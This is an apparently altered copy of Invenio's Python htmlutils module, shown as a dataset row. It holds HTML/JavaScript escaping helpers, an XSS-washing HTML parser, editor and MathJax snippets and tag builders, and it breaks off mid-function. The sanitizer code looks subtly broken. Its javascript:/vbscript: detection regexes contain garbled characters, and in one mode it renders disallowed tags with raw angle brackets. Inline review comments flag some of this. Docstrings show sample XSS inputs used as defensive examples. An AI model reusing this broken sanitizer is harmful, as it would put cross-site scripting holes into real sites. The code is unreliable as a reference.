text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""HTML utilities."""
__revision__ = "$Id$"
from HTMLParser import HTMLParser
from invenio.config import CFG_SITE_URL, \
CFG_MATHJAX_HOSTING, \
CFG_MATHJAX_RENDERS_MATHML, \
CFG_SITE_LANG, \
CFG_WEBDIR
from invenio.textutils import indent_text, encode_for_xml
import re
import cgi
import os
import sys
if sys.hexversion < 0x2060000:
try:
import simplejson as json
CFG_JSON_AVAILABLE = True
except ImportError:
# Okay, no Ajax app will be possible, but continue anyway,
# since this package is only recommended, not mandatory.
CFG_JSON_AVAILABLE = False
json = None
else:
import json
CFG_JSON_AVAILABLE = True
try:
from BeautifulSoup import BeautifulSoup
CFG_BEAUTIFULSOUP_INSTALLED = True
except ImportError:
CFG_BEAUTIFULSOUP_INSTALLED = False
try:
import tidy
CFG_TIDY_INSTALLED = True
except ImportError:
CFG_TIDY_INSTALLED = False
# List of allowed tags (tags that won't create any XSS risk)
CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST = ('a',
                                         'p', 'br', 'blockquote',
                                         'strong', 'b', 'u', 'i', 'em',
                                         'ul', 'ol', 'li', 'sub', 'sup', 'div', 'strike')
# List of allowed attributes. Be cautious, some attributes may be risky:
# <p style="background: url(myxss_suite.js)">
CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST = ('href', 'name', 'class')

## precompile some often-used regexp for speed reasons:
# Matches any HTML tag, or an entity/character reference (e.g. "&#38;").
RE_HTML = re.compile("(?s)<[^>]*>|&#?\w+;")
# Same, but leaves entity/character references untouched.
RE_HTML_WITHOUT_ESCAPED_CHARS = re.compile("(?s)<[^>]*>")

# url validation regex
regex_url = re.compile(r'^(?:http|ftp)s?://' # http:// or https://
    r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
    r'localhost|' #localhost...
    r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
    r'(?::\d+)?' # optional port
    r'(?:/?|[/?]\S+)$', re.IGNORECASE)
def nmtoken_from_string(text):
    """
    Return an XML Nmtoken derived from a string.

    Useful to produce XHTML-valid values for the 'name' attribute of an
    anchor: every character that is not alphanumeric nor one of
    '.', '-', '_', ':' is replaced by its decimal ordinal.

    CAUTION: the mapping is not injective: two different texts may lead
    to the same result. This is improbable on a single page.

    See http://www.w3.org/TR/2000/REC-xml-20001006#NT-Nmtoken
    Note that this filters more characters than strictly required by the
    Nmtoken definition ('CombiningChar' and 'Extender' charsets are
    filtered out as well).
    """
    # Double every dash first, so that the digits produced below cannot
    # collide with a literal dash already present in the input.
    text = text.replace('-', '--')
    safe_extra_chars = ('.', '-', '_', ':')
    pieces = []
    for char in text:
        if char.isalnum() or char in safe_extra_chars:
            pieces.append(char)
        else:
            pieces.append(str(ord(char)))
    return ''.join(pieces)
def escape_html(text, escape_quotes=False):
    """Escape all HTML special characters, avoiding XSS attacks.

    < => &lt;
    > => &gt;
    & => &amp;

    @param text: text to be escaped from HTML tags
    @param escape_quotes: if True, escape any quote mark to its HTML entity:
                          " => &quot;
                          ' => &#39;
    """
    # BUGFIX: the replacement entities had been collapsed into no-op
    # self-replacements; restore the actual HTML entities.
    # '&' must be escaped first, otherwise ampersands introduced by the
    # other replacements would be escaped twice.
    text = text.replace('&', '&amp;')
    text = text.replace('<', '&lt;')
    text = text.replace('>', '&gt;')
    if escape_quotes:
        text = text.replace('"', '&quot;')
        text = text.replace("'", '&#39;')
    return text
# Mapping of characters that must be backslash-escaped when embedding a
# string inside Javascript source code (used when json is unavailable).
CFG_JS_CHARS_MAPPINGS = {
    '\\': '\\\\',
    "'": "\\'",
    '"': '\\"',
    '\b': '\\b',
    '\f': '\\f',
    '\n': '\\n',
    '\r': '\\r',
    '\t': '\\t',
    '\v': '\\v',
}
# Escape the remaining C0 control characters as \uXXXX sequences.
for i in range(0x20):
    CFG_JS_CHARS_MAPPINGS.setdefault(chr(i), '\\u%04x' % (i,))
# U+2028/U+2029 are valid inside JSON strings but are line terminators in
# Javascript source, so they must be escaped too.
# NOTE(review): unichr() ties this module to Python 2.
for i in (0x2028, 0x2029):
    CFG_JS_CHARS_MAPPINGS.setdefault(unichr(i), '\\u%04x' % (i,))
# Any single character that needs escaping before embedding in a JS string.
RE_ESCAPE_JS_CHARS = re.compile(u'''[\\x00-\\x1f\\\\"\\\\'\\b\\f\\n\\r\\t\\v\u2028\u2029]''')
# Closing script tag, matched case-insensitively.
RE_CLOSING_SCRIPT_TAG = re.compile('</script>', re.IGNORECASE)
def escape_javascript_string(text, escape_for_html=True, escape_quote_for_html=False, escape_CDATA=True, escape_script_tag_with_quote='"'):
    """
    Escape C{text} so that it can be used as a Javascript string in
    various contexts.

    The returned string can be enclosed either in single or double
    quote delimiters.

    THE FUNCTION ASSUMES THAT YOU HAVE ALREADY WASHED THE STRING FROM
    UNSAFE CONTENT, according to the context you plan to use the
    string. The function will just make sure that the string will not
    break your Javascript/HTML code/markup.

    @param text: string to be escaped
    @param escape_for_html: if True, also escape the input for HTML
        (needed to produce valid pages when the string is inserted in the
        body of a page; set to False when the string is enclosed in CDATA
        delimiters or returned as part of a pure Javascript document)
    @param escape_quote_for_html: if True, additionally replace double
        quotes by their HTML entity, for use inside a tag attribute
        (e.g. onclick="...")
    @param escape_CDATA: if True, escape closing CDATA delimiters; only
        considered when C{escape_for_html} is False
    @param escape_script_tag_with_quote: which quote delimiter will
        enclose your string; used to split any literal '</script>' so the
        browser does not close the surrounding <script> element
        prematurely. Only considered when C{escape_for_html} is False;
        use None to disable.
    """
    if escape_quote_for_html:
        # BUGFIX: the double quote must be replaced by its HTML entity
        # ('&quot;'), not by itself.
        text = text.replace('"', '&quot;')
    if escape_for_html:
        text = cgi.escape(text)
    elif escape_CDATA:
        # Split closing CDATA delimiters so the output remains valid
        # inside a CDATA section.
        text = text.replace(']]>', ']]]]><![CDATA[>')
    if CFG_JSON_AVAILABLE:
        # json.dumps() backslash-escapes control chars, '"' and '\';
        # strip the surrounding double quotes it adds and escape single
        # quotes by hand so either quoting style works.
        text = json.dumps(text)[1:-1].replace("'", "\\'")
    else:
        # Try to emulate json.dumps() escaping with our mapping table.
        def escape_chars(matchobj):
            return CFG_JS_CHARS_MAPPINGS[matchobj.group(0)]
        text = RE_ESCAPE_JS_CHARS.sub(escape_chars, text)
    if not escape_for_html and escape_script_tag_with_quote:
        # e.g. 'foo</script>bar' -> 'foo</scr"+"ipt>bar' (quote == '"')
        text = RE_CLOSING_SCRIPT_TAG.sub('''</scr%(q)s+%(q)sipt>''' % {'q': escape_script_tag_with_quote}, text)
    return text
class HTMLWasher(HTMLParser):
    """
    Creates a washer for HTML, avoiding XSS attacks. See wash function for
    details on parameters.

    Usage::
        from invenio.htmlutils import HTMLWasher
        washer = HTMLWasher()
        escaped_text = washer.wash(unescaped_text)

    Examples::
        a.wash('Spam and <b><blink>eggs</blink></b>')
        => 'Spam and <b>eggs</b>'
        a.wash('Spam and <b><blink>eggs</blink></b>', True)
        => 'Spam and <b><blink>eggs</blink></b>'
        a.wash('Spam and <b><a href="python.org">eggs</u></b>')
        => 'Spam and <b><a href="python.org">eggs</a></b>'
        a.wash('Spam and <b><a href="javascript:xss();">eggs</a></b>')
        =>'Spam and <b><a href="">eggs</a></b>'
        a.wash('Spam and <b><a href="jaVas cRipt:xss();">poilu</a></b>')
        =>'Spam and <b><a href="">eggs</a></b>'
    """

    # Flag flipped while inside a disallowed <style>/<script> element so
    # that their textual content is dropped as well.
    silent = False

    def __init__(self):
        """ Constructor; initializes washer """
        HTMLParser.__init__(self)
        self.result = ''                 # washed output accumulated so far
        self.nb = 0
        self.previous_nbs = []
        self.previous_type_lists = []
        self.url = ''
        self.render_unallowed_tags = False
        self.allowed_tag_whitelist = \
            CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST
        self.allowed_attribute_whitelist = \
            CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST
        # javascript:
        # NOTE(review): these alternations originally matched both plain
        # and HTML-entity-encoded letters; after entity decoding several
        # branches are duplicates or mojibake (e.g. "(i|Ã|I)", "(t|p|T)").
        # Confirm against upstream before editing.
        self.re_js = re.compile( ".*(j|j|J)"\
                                 "\s*(a|a|A)"\
                                 "\s*(v|v|V)"\
                                 "\s*(a|a|A)"\
                                 "\s*(s|s|S)"\
                                 "\s*(c|c|C)"\
                                 "\s*(r|r|R)"\
                                 "\s*(i|Ã|I)"\
                                 "\s*(p|p|P)"\
                                 "\s*(t|p|T)"\
                                 "\s*(:|:).*", re.IGNORECASE | re.DOTALL)
        # vbscript:
        self.re_vb = re.compile( ".*(v|v|V)"\
                                 "\s*(b|b|B)"\
                                 "\s*(s|s|S)"\
                                 "\s*(c|c|C)"\
                                 "\s*(r|r|R)"\
                                 "\s*(i|Ã|I)"\
                                 "\s*(p|p|P)"\
                                 "\s*(t|p|T)"\
                                 "\s*(:|:).*", re.IGNORECASE | re.DOTALL)

    def wash(self, html_buffer,
             render_unallowed_tags=False,
             allowed_tag_whitelist=CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST,
             automatic_link_transformation=False,
             allowed_attribute_whitelist=\
                 CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST):
        """
        Wash HTML buffer, escaping XSS attacks.

        @param html_buffer: text to escape
        @param render_unallowed_tags: if True, print unallowed tags escaping
            < and >.  Else, only print content of unallowed tags.
        @param allowed_tag_whitelist: list of allowed tags
        @param automatic_link_transformation: if True, also turn valid
            plain http(s) URLs found in text nodes into <a> links.
        @param allowed_attribute_whitelist: list of allowed attributes
        """
        self.reset()
        self.result = ''
        self.nb = 0
        self.previous_nbs = []
        self.previous_type_lists = []
        self.url = ''
        self.render_unallowed_tags = render_unallowed_tags
        self.automatic_link_transformation = automatic_link_transformation
        self.allowed_tag_whitelist = allowed_tag_whitelist
        self.allowed_attribute_whitelist = allowed_attribute_whitelist
        self.feed(html_buffer)
        self.close()
        return self.result

    def handle_starttag(self, tag, attrs):
        """Function called for new opening tags"""
        if tag.lower() in self.allowed_tag_whitelist:
            self.result += '<' + tag
            for (attr, value) in attrs:
                if attr.lower() in self.allowed_attribute_whitelist:
                    # Attribute values are vetted against js/vbscript URLs.
                    self.result += ' %s="%s"' % \
                        (attr, self.handle_attribute_value(value))
            self.result += '>'
        else:
            if self.render_unallowed_tags:
                # NOTE(review): this appends a literal '<'; upstream
                # presumably used '&lt;' -- looks garbled, confirm.
                self.result += '<' + cgi.escape(tag)
                for (attr, value) in attrs:
                    self.result += ' %s="%s"' % \
                        (attr, cgi.escape(value, True))
                # NOTE(review): same remark, presumably '&gt;' upstream.
                self.result += '>'
            elif tag == 'style' or tag == 'script':
                # In that case we want to remove content too
                self.silent = True

    def handle_data(self, data):
        """Function called for text nodes"""
        if not self.silent:
            possible_urls = re.findall(r'(https?://[\w\d:#%/;$()~_?\-=\\\.&]*)', data)
            # validate possible urls
            # we'll transform them just in case
            # they are valid.
            if possible_urls and self.automatic_link_transformation:
                for url in possible_urls:
                    if regex_url.search(url):
                        transformed_url = '<a href="%s">%s</a>' % (url, url)
                        data = data.replace(url, transformed_url)
                self.result += data
            else:
                self.result += cgi.escape(data, True)

    def handle_endtag(self, tag):
        """Function called for ending of tags"""
        if tag.lower() in self.allowed_tag_whitelist:
            self.result += '</' + tag + '>'
        else:
            if self.render_unallowed_tags:
                # NOTE(review): presumably '&lt;/' ... '&gt;' upstream.
                self.result += '</' + cgi.escape(tag) + '>'
        # Leaving a <style>/<script> element: resume emitting text nodes.
        if tag == 'style' or tag == 'script':
            self.silent = False

    def handle_startendtag(self, tag, attrs):
        """Function called for empty tags (e.g. <br />)"""
        if tag.lower() in self.allowed_tag_whitelist:
            self.result += '<' + tag
            for (attr, value) in attrs:
                if attr.lower() in self.allowed_attribute_whitelist:
                    self.result += ' %s="%s"' % \
                        (attr, self.handle_attribute_value(value))
            self.result += ' />'
        else:
            if self.render_unallowed_tags:
                # NOTE(review): presumably '&lt;' upstream, see above.
                self.result += '<' + cgi.escape(tag)
                for (attr, value) in attrs:
                    self.result += ' %s="%s"' % \
                        (attr, cgi.escape(value, True))
                self.result += ' />'

    def handle_attribute_value(self, value):
        """Check attribute. Especially designed for avoiding URLs in the form:
        javascript:myXSSFunction();"""
        if self.re_js.match(value) or self.re_vb.match(value):
            return ''
        return value

    def handle_charref(self, name):
        """Process character references of the form "&#ref;". Return it as it is."""
        self.result += '&#' + name + ';'

    def handle_entityref(self, name):
        """Process a general entity reference of the form "&name;".
        Return it as it is."""
        self.result += '&' + name + ';'
def tidy_html(html_buffer, cleaning_lib='utidylib'):
    """
    Tidy up the input HTML using one of the installed cleaning
    libraries.

    @param html_buffer: the input HTML to clean up
    @type html_buffer: string
    @param cleaning_lib: chose the preferred library to clean the HTML. One of:
        - utidylib
        - beautifulsoup
    @return: a cleaned version of the input HTML
    @note: requires uTidylib or BeautifulSoup to be installed. If the
        chosen library is missing, the input X{html_buffer} is returned
        I{as is}.
    """
    if CFG_TIDY_INSTALLED and cleaning_lib == 'utidylib':
        options = dict(output_xhtml=1,
                       show_body_only=1,
                       merge_divs=0,
                       wrap=0)
        try:
            output = str(tidy.parseString(html_buffer, **options))
        except Exception:
            # BUGFIX: was a bare 'except:' which also swallowed
            # SystemExit/KeyboardInterrupt. Cleaning stays best-effort:
            # fall back to the raw input on any library error.
            output = html_buffer
    elif CFG_BEAUTIFULSOUP_INSTALLED and cleaning_lib == 'beautifulsoup':
        try:
            output = str(BeautifulSoup(html_buffer).prettify())
        except Exception:
            # Same best-effort fallback as above.
            output = html_buffer
    else:
        # Requested library not installed: return the input unchanged.
        output = html_buffer
    return output
def get_mathjax_header(https=False):
    """
    Return the snippet of HTML code to put in HTML HEAD tag, in order to
    enable MathJax support.

    @param https: when using the CDN, whether to use the HTTPS URL rather
        than the HTTP one.
    @type https: bool
    @note: with new releases of MathJax, update this function together with
        $MJV variable in the root Makefile.am
    """
    if CFG_MATHJAX_HOSTING.lower() == 'cdn':
        # Serve MathJax from the CDN, honouring the requested scheme.
        mathjax_path = ("https://d3eoax9i5htok0.cloudfront.net/mathjax/2.1-latest"
                        if https
                        else "http://cdn.mathjax.org/mathjax/2.1-latest")
    else:
        # Locally hosted copy.
        mathjax_path = "/MathJax"
    mathjax_config = ("TeX-AMS-MML_HTMLorMML" if CFG_MATHJAX_RENDERS_MATHML
                      else "TeX-AMS_HTML")
    return """<script type="text/x-mathjax-config">
MathJax.Hub.Config({
tex2jax: {inlineMath: [['$','$'],['$$','$$']],
displayMath: [['\\\\[','\\\\]']],
processEscapes: true},
showProcessingMessages: false,
messageStyle: "none"
});
</script>
<script src="%(mathjax_path)s/MathJax.js?config=%(mathjax_config)s" type="text/javascript">
</script>""" % {
        'mathjax_path': mathjax_path,
        'mathjax_config': mathjax_config,
    }
def is_html_text_editor_installed():
    """
    Returns True if the wysiwyg editor (CKeditor) is installed
    """
    ckeditor_js = os.path.join(CFG_WEBDIR, 'ckeditor', 'ckeditor.js')
    return os.path.exists(ckeditor_js)

# Computed once at import time; used by get_html_text_editor().
ckeditor_available = is_html_text_editor_installed()
def get_html_text_editor(name, id=None, content='', textual_content=None, width='300px', height='200px',
                         enabled=True, file_upload_url=None, toolbar_set="Basic",
                         custom_configurations_path='/ckeditor/invenio-ckeditor-config.js',
                         ln=CFG_SITE_LANG):
    """
    Returns a wysiwyg editor (CKEditor) to embed in html pages.

    Fall back to a simple textarea when the library is not installed,
    or when the user's browser is not compatible with the editor, or
    when 'enable' is False, or when javascript is not enabled.

    NOTE that the output also contains a hidden field named
    'editor_type' that contains the kind of editor used, 'textarea' or
    'ckeditor'.

    Based on 'editor_type' you might want to take different actions,
    like replace CRLF with <br/> when editor_type equals to
    'textarea', but not when editor_type equals to 'ckeditor'.

    @param name: *str* the name attribute of the returned editor
    @param id: *str* the id attribute of the returned editor (when
        applicable)
    @param content: *str* the default content of the editor.
    @param textual_content: *str* a content formatted for the case where the
        wysiwyg editor is not available for user. When not
        specified, use value of 'content'
    @param width: *str* width of the editor in an html compatible unit:
        Eg: '400px', '50%'.
    @param height: *str* height of the editor in an html compatible unit:
        Eg: '400px', '50%'.
    @param enabled: *bool* if the wysiwyg editor is return (True) or if a
        simple texteara is returned (False)
    @param file_upload_url: *str* the URL used to upload new files via the
        editor upload panel. You have to implement the
        handler for your own use. The URL handler will get
        form variables 'File' as POST for the uploaded file,
        and 'Type' as GET for the type of file ('file',
        'image', 'flash', 'media')
        When value is not given, the file upload is disabled.
    @param toolbar_set: *str* the name of the toolbar layout to
        use. CKeditor comes by default with 'Basic' and
        'Default'. To define other sets, customize the
        config file in
        /opt/cds-invenio/var/www/ckeditor/invenio-ckconfig.js
    @param custom_configurations_path: *str* value for the CKeditor config
        variable 'CustomConfigurationsPath',
        which allows to specify the path of a
        file that contains a custom configuration
        for the editor. The path is relative to
        /opt/invenio/var/www/
    @param ln: *str* interface language of the editor
    @return: the HTML markup of the editor
    """
    if textual_content is None:
        textual_content = content
    editor = ''
    if enabled and ckeditor_available:
        # Prepare upload path settings
        file_upload_script = ''
        if file_upload_url is not None:
            file_upload_script = ''',
filebrowserLinkUploadUrl: '%(file_upload_url)s',
filebrowserImageUploadUrl: '%(file_upload_url)s?type=Image',
filebrowserFlashUploadUrl: '%(file_upload_url)s?type=Flash'
''' % {'file_upload_url': file_upload_url}
        # Prepare code to instantiate an editor
        editor += '''
<script type="text/javascript" language="javascript">//<![CDATA[
/* Load the script only once, or else multiple instance of the editor on the same page will not work */
var INVENIO_CKEDITOR_ALREADY_LOADED
if (INVENIO_CKEDITOR_ALREADY_LOADED != 1) {
document.write('<script type="text/javascript" src="%(CFG_SITE_URL)s/ckeditor/ckeditor.js"><\/script>');
INVENIO_CKEDITOR_ALREADY_LOADED = 1;
}
//]]></script>
<input type="hidden" name="editor_type" id="%(id)seditortype" value="textarea" />
<textarea rows="100" cols="80" id="%(id)s" name="%(name)s" style="width:%(width)s;height:%(height)s">%(textual_content)s</textarea>
<textarea rows="100" cols="80" id="%(id)shtmlvalue" name="%(name)shtmlvalue" style="display:none;width:%(width)s;height:%(height)s">%(html_content)s</textarea>
<script type="text/javascript">//<![CDATA[
var CKEDITOR_BASEPATH = '/ckeditor/';
CKEDITOR.replace( '%(name)s',
{customConfig: '%(custom_configurations_path)s',
toolbar: '%(toolbar)s',
width: '%(width)s',
height:'%(height)s',
language: '%(ln)s'
%(file_upload_script)s
});
CKEDITOR.on('instanceReady',
function( evt )
{
/* If CKeditor was correctly loaded, display the nice HTML representation */
var oEditor = evt.editor;
editor_id = oEditor.id
editor_name = oEditor.name
var html_editor = document.getElementById(editor_name + 'htmlvalue');
oEditor.setData(html_editor.value);
var editor_type_field = document.getElementById(editor_name + 'editortype');
editor_type_field.value = 'ckeditor';
var writer = oEditor.dataProcessor.writer;
writer.indentationChars = ''; /*Do not indent source code with tabs*/
oEditor.resetDirty();
/* Workaround: http://dev.ckeditor.com/ticket/3674 */
evt.editor.on( 'contentDom', function( ev )
{
ev.removeListener();
evt.editor.resetDirty();
} );
/* End workaround */
})
//]]></script>
''' % \
            {'textual_content': cgi.escape(textual_content),
             'html_content': content,
             'width': width,
             'height': height,
             'name': name,
             'id': id or name,
             'custom_configurations_path': custom_configurations_path,
             'toolbar': toolbar_set,
             'file_upload_script': file_upload_script,
             'CFG_SITE_URL': CFG_SITE_URL,
             'ln': ln}
    else:
        # CKedior is not installed
        textarea = '<textarea rows="100" cols="80" %(id)s name="%(name)s" style="width:%(width)s;height:%(height)s">%(content)s</textarea>' \
            % {'content': cgi.escape(textual_content),
               'width': width,
               'height': height,
               'name': name,
               'id': id and ('id="%s"' % id) or ''}
        editor += textarea
        editor += '<input type="hidden" name="editor_type" value="textarea" />'
    return editor
def remove_html_markup(text, replacechar=' ', remove_escaped_chars_p=True):
    """
    Remove HTML markup from text.

    @param text: Input text.
    @type text: string.
    @param replacechar: By which character should we replace HTML markup.
        Usually, a single space or an empty string are nice values.
    @type replacechar: string
    @param remove_escaped_chars_p: If True, also remove escaped characters
        like '&amp;', '&lt;', '&gt;' and '&quot;'.
    @type remove_escaped_chars_p: boolean
    @return: Input text with HTML markup removed.
    @rtype: string
    """
    # Pick the precompiled pattern matching either tags only, or tags
    # plus entity/character references.
    pattern = RE_HTML if remove_escaped_chars_p else RE_HTML_WITHOUT_ESCAPED_CHARS
    return pattern.sub(replacechar, text)
def unescape(s, quote=False):
    """
    The opposite of the cgi.escape function.

    Replace the escaped sequences '&amp;', '&lt;' and '&gt;' with the
    corresponding regular characters. If the optional flag quote is true,
    the escaped quotation mark ('&quot;') is also translated.

    @param s: the string to unescape
    @param quote: if True, also translate '&quot;' back to '"'
    """
    # BUGFIX: the entity names had been collapsed into no-op
    # self-replacements; restore the actual entity -> character mapping.
    s = s.replace('&lt;', '<')
    s = s.replace('&gt;', '>')
    if quote:
        s = s.replace('&quot;', '"')
    # '&amp;' must be translated last, otherwise e.g. '&amp;lt;' would be
    # wrongly turned into '<'.
    s = s.replace('&amp;', '&')
    return s
class EscapedString(str):
    """
    This class is a stub used by the MLClass machinery in order
    to distinguish native string, from string that don't need to be
    escaped.

    Instances carry no extra behaviour: the subclass itself is the marker
    checked (via isinstance) by create_tag() and the Escaped*String
    constructors to avoid double-escaping.
    """
    pass
class EscapedHTMLString(EscapedString):
    """
    This class automatically escape a non-escaped string used to initialize
    it, using the HTML escaping method (i.e. cgi.escape).
    """
    def __new__(cls, original_string='', escape_quotes=False):
        # Already-escaped input is taken verbatim, without double-escaping.
        if isinstance(original_string, EscapedString):
            escaped_string = str(original_string)
        else:
            if original_string and not str(original_string).strip():
                # Whitespace-only input collapses to a single space.
                # NOTE(review): upstream versions apparently used '&nbsp;'
                # here -- looks garbled, confirm before relying on it.
                escaped_string = ' '
            else:
                escaped_string = cgi.escape(str(original_string), escape_quotes)
        obj = str.__new__(cls, escaped_string)
        # Keep the pristine input so __repr__ can reproduce the call.
        obj.original_string = original_string
        obj.escape_quotes = escape_quotes
        return obj
    def __repr__(self):
        return 'EscapedHTMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))
    def __add__(self, rhs):
        # Concatenation of two already-escaped strings needs no re-escaping.
        return EscapedHTMLString(EscapedString(str(self) + str(rhs)))
class EscapedXMLString(EscapedString):
    """
    This class automatically escape a non-escaped string used to initialize
    it, using the XML escaping method (i.e. encode_for_xml).
    """
    def __new__(cls, original_string='', escape_quotes=False):
        # Already-escaped input is taken verbatim, without double-escaping.
        if isinstance(original_string, EscapedString):
            escaped_string = str(original_string)
        else:
            if original_string and not str(original_string).strip():
                # Whitespace-only input collapses to a single space.
                # NOTE(review): upstream versions apparently used '&nbsp;'
                # here -- looks garbled, confirm before relying on it.
                escaped_string = ' '
            else:
                escaped_string = encode_for_xml(str(original_string), wash=True, quote=escape_quotes)
        obj = str.__new__(cls, escaped_string)
        # Keep the pristine input so __repr__ can reproduce the call.
        obj.original_string = original_string
        obj.escape_quotes = escape_quotes
        return obj
    def __repr__(self):
        return 'EscapedXMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))
    def __add__(self, rhs):
        # Concatenation of two already-escaped strings needs no re-escaping.
        return EscapedXMLString(EscapedString(str(self) + str(rhs)))
def create_tag(tag, escaper=EscapedHTMLString, opening_only=False, body=None, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
    """
    Create an XML/HTML tag.

    This function create a full XML/HTML tag, putting toghether an
    optional inner body and a dictionary of attributes.

        >>> print create_html_tag ("select", create_html_tag("h1",
        ... "hello", other_attrs={'class': "foo"}))
        <select>
          <h1 class="foo">
            hello
          </h1>
        </select>

    @param tag: the tag (e.g. "select", "body", "h1"...).
    @type tag: string
    @param escaper: the EscapedString subclass used to escape attribute
        values and (optionally) the body.
    @param opening_only: if True, emit only the opening tag (no closing
        tag, no self-closing ' />').
    @param body: some text/HTML to put in the body of the tag (this
        body will be indented WRT the tag).
    @type body: string
    @param escape_body: wether the body (if any) must be escaped.
    @type escape_body: boolean
    @param escape_attr: wether the attribute values (if any) must be
        escaped.
    @type escape_attr: boolean
    @param indent: number of level of indentation for the tag.
    @type indent: integer
    @param attrs: map of attributes to add to the tag.
    @type attrs: dict
    @return: the HTML tag.
    @rtype: string
    """
    if attrs is None:
        attrs = {}
    # Keyword attributes win over the attrs map; a trailing underscore
    # lets callers pass Python reserved words (e.g. class_ -> class).
    for key, value in other_attrs.iteritems():
        if value is not None:
            if key.endswith('_'):
                attrs[key[:-1]] = value
            else:
                attrs[key] = value
    out = "<%s" % tag
    for key, value in attrs.iteritems():
        if escape_attr:
            value = escaper(value, escape_quotes=True)
        out += ' %s="%s"' % (key, value)
    if body is not None:
        # A lazy body produced by MLClass is materialized now.
        if callable(body) and body.__name__ == 'handle_body':
            body = body()
        out += ">"
        if escape_body and not isinstance(body, EscapedString):
            body = escaper(body)
        out += body
        if not opening_only:
            out += "</%s>" % tag
    elif not opening_only:
        # No body: emit a self-closed tag.
        out += " />"
    if indent:
        # indent_text() appends a trailing newline; strip it.
        out = indent_text(out, indent)[:-1]
    return EscapedString(out)
class MLClass(object):
    """
    Swiss army knife to generate XML or HTML strings a la carte.

    >>> from invenio.htmlutils import X, H
    >>> X.foo()()
    ... '<foo />'
    >>> X.foo(bar='baz')()
    ... '<foo bar="baz" />'
    >>> X.foo(bar='baz&amp;pi')()
    ... '<foo bar="baz&amp;pi" />'
    >>> X.foo("<body />", bar='baz')
    ... '<foo bar="baz"><body /></foo>'
    >>> X.foo(bar='baz')(X.body())
    ... '<foo bar="baz"><body /></foo>'
    >>> X.foo(bar='baz')("<body />") ## automatic escaping
    ... '<foo bar="baz">&lt;body /&gt;</foo>'
    >>> X.foo()(X.p(), X.p()) ## magic concatenation
    ... '<foo><p /><p /></foo>'
    >>> X.foo(class_='bar')() ## protected keywords...
    ... '<foo class="bar" />'
    >>> X["xml-bar"]()()
    ... '<xml-bar />'
    """
    def __init__(self, escaper):
        # EscapedString subclass used to escape bodies that are not
        # already escaped (see handle_body below).
        self.escaper = escaper

    def __getattr__(self, tag):
        # Attribute access (X.foo) builds a factory for <foo> tags.
        def tag_creator(body=None, opening_only=False, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
            if body:
                # Body given directly: render the tag immediately.
                return create_tag(tag, body=body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
            else:
                # No body yet: return a callable that accepts any number
                # of bodies later (enables the X.foo(bar='baz')(...) form).
                def handle_body(*other_bodies):
                    full_body = None
                    if other_bodies:
                        full_body = ""
                        for body in other_bodies:
                            if callable(body) and body.__name__ == 'handle_body':
                                # Nested lazy tag: materialize it.
                                full_body += body()
                            elif isinstance(body, EscapedString):
                                full_body += body
                            else:
                                # Plain string: escape it automatically.
                                full_body += self.escaper(str(body))
                    return create_tag(tag, body=full_body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
                return handle_body
        return tag_creator

    # X["xml-bar"] supports tag names that are not valid identifiers.
    __getitem__ = __getattr__

# Ready-made generators: H escapes for HTML, X escapes for XML.
H = MLClass(EscapedHTMLString)
X = MLClass(EscapedXMLString)
def create_html_select(options, name=None, selected=None, disabled=None, multiple=False, attrs=None, **other_attrs):
    """
    Create an HTML select box.

    >>> print create_html_select(["foo", "bar"], selected="bar", name="baz")
    <select name="baz">
      <option selected="selected" value="bar">
        bar
      </option>
      <option value="foo">
        foo
      </option>
    </select>
    >>> print create_html_select([("foo", "oof"), ("bar", "rab")], selected="bar", name="baz")
    <select name="baz">
      <option value="foo">
        oof
      </option>
      <option selected="selected" value="bar">
        rab
      </option>
    </select>

    @param options: this can either be a sequence of strings, or a sequence
        of couples or a map of C{key->value}. In the former case, the C{select}
        tag will contain a list of C{option} tags (in alphabetical order),
        where the C{value} attribute is not specified. In the latter case,
        the C{value} attribute will be set to the C{key}, while the body
        of the C{option} will be set to C{value}.
    @type options: sequence or map
    @param name: the name of the form element.
    @type name: string
    @param selected: optional key(s)/value(s) to select by default. In case
        a map has been used for options.
    @type selected: string (or list of string)
    @param disabled: optional key(s)/value(s) to disable.
    @type disabled: string (or list of string)
    @param multiple: whether a multiple select box must be created.
    @type mutable: bool
    @param attrs: optional attributes to create the select tag.
    @type attrs: dict
    @param other_attrs: other optional attributes.
    @return: the HTML output.
    @rtype: string
    @note: the values and keys will be escaped for HTML.
    @note: it is important that parameter C{value} is always
        specified, in case some browser plugin play with the
        markup, for eg. when translating the page.
    """
    body = []
    # Normalize selected/disabled to lists so 'in' tests work uniformly.
    if selected is None:
        selected = []
    elif isinstance(selected, (str, unicode)):
        selected = [selected]
    if disabled is None:
        disabled = []
    elif isinstance(disabled, (str, unicode)):
